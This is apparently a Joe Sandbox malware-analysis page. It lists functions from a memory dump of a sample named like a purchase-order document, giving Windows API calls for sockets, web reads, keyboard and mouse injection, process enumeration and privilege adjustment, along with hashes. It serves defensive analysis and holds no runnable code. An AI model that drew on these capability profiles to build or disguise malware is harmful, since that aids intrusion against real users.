Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 44b2aba24df5de21a78a234cf013e4b0a3a59c267238b4e76a173c11773f76c9
Instruction ID: 587800f399d3e97c7064dddcab1d8cf1a1dbd40b6f0cd93bf47d5a76b552fe8d
Opcode Fuzzy Hash: 44b2aba24df5de21a78a234cf013e4b0a3a59c267238b4e76a173c11773f76c9
Instruction Fuzzy Hash: BCC21A71E086298FDB29CE28DD407EAB7F5EB49305F1581EAD44DE7241E774AE828F40

Function 001B648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001B64DC
CoInitialize.OLE32(00000000), ref: 001B6639
CoCreateInstance.OLE32(001DFCF8,00000000,00000001,001DFB68,?), ref: 001B6650
CoUninitialize.OLE32 ref: 001B68D4

Strings

.lnk, xrefs: 001B64BA, 001B6524, 001B65E0

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: aa8bcd23ee8b2c5c2bdce7bfa3367a1edde06bf2595ff970e155208a13ec6304
Instruction ID: eba0de6e904314fba357371ac1f3a6ca80b1b6e37aa15dd3f962e3003c1fec1d
Opcode Fuzzy Hash: aa8bcd23ee8b2c5c2bdce7bfa3367a1edde06bf2595ff970e155208a13ec6304
Instruction Fuzzy Hash: 90D139715083019FC314EF24C881DABB7E9FFA9744F10496DF5958B2A1DB71E909CB92

Function 001C22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 001C22E8

Part of subcall function 001BE4EC: GetWindowRect.USER32(?,?), ref: 001BE504

GetDesktopWindow.USER32 ref: 001C2312
GetWindowRect.USER32(00000000), ref: 001C2319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 001C2355
GetCursorPos.USER32(?), ref: 001C2381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001C23DF

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: fc0e4faa44738ffa557d34a0f54938c7c2d910b8745b07d304008d578674684c
Instruction ID: a33c9695d29398b64e4dcbe09c29d51b316a266c3045bbdf9f70cd73f7023948
Opcode Fuzzy Hash: fc0e4faa44738ffa557d34a0f54938c7c2d910b8745b07d304008d578674684c
Instruction Fuzzy Hash: 3731DC72106346ABC720DF54D808F9BBBA9FB98714F000A1EF88497181DB34EA48CBD2

Function 001B9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 001B9B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 001B9C8B

Part of subcall function 001B3874: GetInputState.USER32 ref: 001B38CB
Part of subcall function 001B3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001B3966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 001B9BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 001B9C75

Strings

*.*, xrefs: 001B9B5D

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 5af66c9f249196a58eea196058eb0b076b31148585b6271fc1f9660667e7d924
Instruction ID: d78c28f151339c6dc2429afcab1b6d973d78961cca4642fa97fcd07648fae118
Opcode Fuzzy Hash: 5af66c9f249196a58eea196058eb0b076b31148585b6271fc1f9660667e7d924
Instruction Fuzzy Hash: 9041807194120AAFCF14DFA4C989AEEBBB4EF15310F204156F505A71A1EB309E95CFA0

Function 00148060 Relevance: 8.7, Strings: 6, Instructions: 1151COMMON

Download Yara Rule

Strings

ERCP, xrefs: 0014813C
_______________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{, xrefs: 00185D55
VUUU, xrefs: 00185DF0
VUUU, xrefs: 0014843C
VUUU, xrefs: 001483FA
VUUU, xrefs: 001483E8

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU$_______________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{
API String ID: 0-2009957334
Opcode ID: ec53f2ae3c28bea9cd28bad2d19a40c54220da0ae65aeffdb00d686f5cf7bcab
Instruction ID: 92b0f601a77e8414bd6f43fdfb0462bdfe0b7f87a03c407f76e8ad3d3096846a
Opcode Fuzzy Hash: ec53f2ae3c28bea9cd28bad2d19a40c54220da0ae65aeffdb00d686f5cf7bcab
Instruction Fuzzy Hash: 36A27071E0061ACBDF24DF58C8507AEB7B2FF54314F2581AAE815AB295DB709E81CF90

Function 0015997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00159BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00159BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00159A4E
GetSysColor.USER32(0000000F), ref: 00159B23
SetBkColor.GDI32(?,00000000), ref: 00159B36

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 13c695ce5b28d92faade3b908edac03832463c2b4c9c0757ca769d781ddfe7d2
Instruction ID: c5fa91400d9d11c65f5f0aa0fea77c718e83bcb629c90a60bfa2ede97f53faa2
Opcode Fuzzy Hash: 13c695ce5b28d92faade3b908edac03832463c2b4c9c0757ca769d781ddfe7d2
Instruction Fuzzy Hash: C9A108B0218544EEEB2DAA3C9C4CDBB365DDF52342B16420AF922CF6D5CB259D05C273

Function 001C1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 001C304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001C307A
Part of subcall function 001C304E: _wcslen.LIBCMT ref: 001C309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 001C185D
WSAGetLastError.WSOCK32 ref: 001C1884
bind.WSOCK32(00000000,?,00000010), ref: 001C18DB
WSAGetLastError.WSOCK32 ref: 001C18E6
closesocket.WSOCK32(00000000), ref: 001C1915

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 7872cff18f1321441e9869aeb681bde09acd3048cb7e3e298cc4a687929dcfe9
Instruction ID: 11b77ddfcf9cb760a82d5a948cff3556da003358e995e3a9a504b4f459c63e8f
Opcode Fuzzy Hash: 7872cff18f1321441e9869aeb681bde09acd3048cb7e3e298cc4a687929dcfe9
Instruction Fuzzy Hash: 5D519F71A40210AFDB10AF64C886F2AB7A5AB59718F18849CF9169F3D3C771ED41CBE1

Function 001D1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 001D1CC0
IsWindowEnabled.USER32 ref: 001D1CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 001D1CDB
IsIconic.USER32 ref: 001D1CE9
IsZoomed.USER32 ref: 001D1CF7

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 45a54a9620647ffab8c9e865363613057b0a3988825d97cd232e07d4b56dee04
Instruction ID: 6e39fb0c558197d015062c6ba3d7c60425abdc8ea1c5da5a93eb06bffaba5df4
Opcode Fuzzy Hash: 45a54a9620647ffab8c9e865363613057b0a3988825d97cd232e07d4b56dee04
Instruction Fuzzy Hash: 7A2102317522017FD7208F2AC884B2A7BE5EF94320F19806AE84ACB351CB71EC42CBD0

Function 001A8298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 001A82AA

Strings

tb , xrefs: 001A84F4
(, xrefs: 001A82F0
|, xrefs: 001A82DA

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: lstrlen
String ID: ($tb $|
API String ID: 1659193697-4033350771
Opcode ID: 587dff18cf6dedeeacc27b883f87f82cdf8f5e62507732aaea640dc464e71815
Instruction ID: d66500697d6623988cc6ac2edcbfc6b6f99b2d976c5ab7bff38acc80e188a862
Opcode Fuzzy Hash: 587dff18cf6dedeeacc27b883f87f82cdf8f5e62507732aaea640dc464e71815
Instruction Fuzzy Hash: EB322579A007059FCB28CF59C481A6AB7F0FF48710B15C56EE99ADB3A1EB70E941CB40

Function 001CA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 001CA6AC
Process32FirstW.KERNEL32(00000000,?), ref: 001CA6BA

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

Process32NextW.KERNEL32(00000000,?), ref: 001CA79C
CloseHandle.KERNEL32(00000000), ref: 001CA7AB

Part of subcall function 0015CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00183303,?), ref: 0015CE8A

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 963ec8eafee798387c4c1c14f57e935473936328a3c316014d72c531de74a84e
Instruction ID: 25e0c252b1dcafe970dd62e6c323252e5e04b3bf969d02e2cf2665536df96747
Opcode Fuzzy Hash: 963ec8eafee798387c4c1c14f57e935473936328a3c316014d72c531de74a84e
Instruction Fuzzy Hash: 7C516C71508311AFD310EF24D886E6BBBE8FFA9754F40491DF99997262EB30D904CB92

Function 001AAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 001AAAAC
SetKeyboardState.USER32(00000080), ref: 001AAAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 001AAB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 001AAB88

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: c884f0988db7a0d46db7c8cda0e38fb0eb7297fae232f2cf16fee31800fc3675
Instruction ID: 945d7f761514dd0eccd1ec8801f8f46e7fa3e95960c1d1325b974ab6d668b50e
Opcode Fuzzy Hash: c884f0988db7a0d46db7c8cda0e38fb0eb7297fae232f2cf16fee31800fc3675
Instruction Fuzzy Hash: 16313934A80348AEFF35CB64CC05BFA7BA6AF56320F84421BF581965D1D3759981C7B2

Function 001BCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 001BCE89
GetLastError.KERNEL32(?,00000000), ref: 001BCEEA
SetEvent.KERNEL32(?,?,00000000), ref: 001BCEFE

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 7e30a12f91864be048dfcdec4f053da5a95948fee8d0af8d390e169f24ca2c29
Instruction ID: 613448248fd67da98a0fa9c2b8ddae2ff9a7363e3a92511bc51978b7ac994e05
Opcode Fuzzy Hash: 7e30a12f91864be048dfcdec4f053da5a95948fee8d0af8d390e169f24ca2c29
Instruction Fuzzy Hash: B9219D71601306EBDB20DFA5C948BA77BF8EB50354F10481EE546D2151E770EE44CBE0

Function 001ADBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00185222), ref: 001ADBCE
GetFileAttributesW.KERNEL32(?), ref: 001ADBDD
FindFirstFileW.KERNEL32(?,?), ref: 001ADBEE
FindClose.KERNEL32(00000000), ref: 001ADBFA

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: ae002422ecffec8c64097ae954572e9abd3a19118f75b27373efa784f302b656
Instruction ID: 7e36bb20015d51904a3908a75ac94ac23edfad18cfab676dfb3c8092ea877029
Opcode Fuzzy Hash: ae002422ecffec8c64097ae954572e9abd3a19118f75b27373efa784f302b656
Instruction Fuzzy Hash: 61F0A0308129215782206B78EC0D8AA376D9F03334B904B1BF876C28E0EBB45D94C6D5

Function 001B5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 001B5CC1
FindNextFileW.KERNEL32(00000000,?), ref: 001B5D17
FindClose.KERNEL32(?), ref: 001B5D5F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: a7f6eb8217b2ea7a561750669d75fcb924a147e11e7e005a59865c9f5706ea10
Instruction ID: 5786744156e26b5b467a7284aed5e34e014a6a658f501432e3a1e00f24f5fd80
Opcode Fuzzy Hash: a7f6eb8217b2ea7a561750669d75fcb924a147e11e7e005a59865c9f5706ea10
Instruction Fuzzy Hash: 5B519974604A019FC714CF68C894A9AB7E5FF49314F148A5EE99A8B3A2CB30FD45CF91

Function 00172622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0017271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00172724
UnhandledExceptionFilter.KERNEL32(?), ref: 00172731

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: c28f90e5547ad01b9c5c45a6c6d2290355540a9941381c3e590f898ed917b119
Instruction ID: 65f14d8c88032bfa191fe82adb4c55660c5b10cfa77ef393bddbb5befb921bfc
Opcode Fuzzy Hash: c28f90e5547ad01b9c5c45a6c6d2290355540a9941381c3e590f898ed917b119
Instruction Fuzzy Hash: 5431B774911218ABCB21DF64DD8979DB7B8BF18310F5082DAE81CA7261E7309F818F45

Function 001B51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001B51DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 001B5238
SetErrorMode.KERNEL32(00000000), ref: 001B52A1

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: fe6bcac8bb77a6fd12a7168ea9fda1c052f73df93a7b47eaf5bc82d445c73430
Instruction ID: 8b9761ed8d2a404a2e9df131e8770008c49f2c292c0d3081ca397eb39efe9393
Opcode Fuzzy Hash: fe6bcac8bb77a6fd12a7168ea9fda1c052f73df93a7b47eaf5bc82d445c73430
Instruction Fuzzy Hash: DB314C75A01519DFDB00DF54D884FAEBBB5FF49314F048499E805AB3A2DB31E856CB90

Function 001A16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0015FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00160668
Part of subcall function 0015FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00160685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001A170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001A173A
GetLastError.KERNEL32 ref: 001A174A

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: e7e4a9f00e1957bc2f083b44e4b9dcc3ed7658952fe7b1adbbcfa41164e252d1
Instruction ID: 0c7efa09d2386b4e6044002b97e336ee09943d6589d4f849a804450a971dd34c
Opcode Fuzzy Hash: e7e4a9f00e1957bc2f083b44e4b9dcc3ed7658952fe7b1adbbcfa41164e252d1
Instruction Fuzzy Hash: DA11C1B2400305BFD7189F94DC86D6BB7B9EB04714B20852EF45697641EB70BC41CA60

Function 001AD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001AD608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 001AD645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001AD650

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
